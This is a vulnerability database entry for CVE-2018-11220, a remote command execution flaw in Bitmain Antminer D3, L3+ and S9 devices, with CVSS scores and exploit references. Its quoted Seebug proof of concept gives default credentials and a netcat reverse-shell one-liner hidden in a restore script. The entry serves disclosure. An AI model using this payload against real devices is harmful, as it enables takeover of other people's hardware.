Vulnerabilities > CVE-2018-11220 - Unspecified vulnerability in Bitmain products

047910
CVSS 9.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
SINGLE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
bitmain
critical
exploit available

Summary

Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution via the system restore function.

Exploit-Db

descriptionBitmain Antminer D3/L3+/S9 - Remote Command Execution. CVE-2018-11220. Remote exploit for Hardware platform
fileexploits/hardware/remote/44779.txt
idEDB-ID:44779
last seen2018-05-28
modified2018-05-27
platformhardware
port
published2018-05-27
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/44779/
titleBitmain Antminer D3/L3+/S9 - Remote Command Execution
typeremote

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/147950/bitmainantminer-exec.txt
idPACKETSTORM:147950
last seen2018-05-31
published2018-05-27
reporterCorrado Liotta
sourcehttps://packetstormsecurity.com/files/147950/Bitmain-Antminer-D3-L3-S9-Remote-Command-Execution.html
titleBitmain Antminer D3/L3+/S9 Remote Command Execution

Seebug

bulletinFamilyexploit
description* Exploit Title: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution * Google Dork: N/A * Date: 27/05/2018 * Exploit Author: Corrado Liotta * Vendor Homepage: https://www.bitmain.com/ * Software Link: N/A * Version: Antminer - D3, L3+, S9, and other * Tested on: Windows/Linux * CVE : CVE-2018-11220 ### Description The software used by the miners produced by the bitmain (AntMiner) is affected by a vulnerability of remote code execution type, it is possible through the "Retore Backup" functionality of the administration portal to execute commands on the system. This would allow a malicious user with valid credentials to access the entire file system with administrative privileges. ### POC Login on Antminer Configuration Portal (Default Credential: root/root) 1) Create a file named: restoreConfig.sh 2) insert inside: ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port >/tmp/f ``` 3) Generate archive by inserting the file created before: Exploit.tar 4) Launch net cat and upload file: ``` nc -vv -l -p port ``` system --> upgrade --> upload archive
idSSV:97314
last seen2018-06-26
modified2018-05-28
published2018-05-28
reporterMy Seebug
titleBitmain Antminer D3/L3+/S9 - Remote Command Execution(CVE-2018-11220)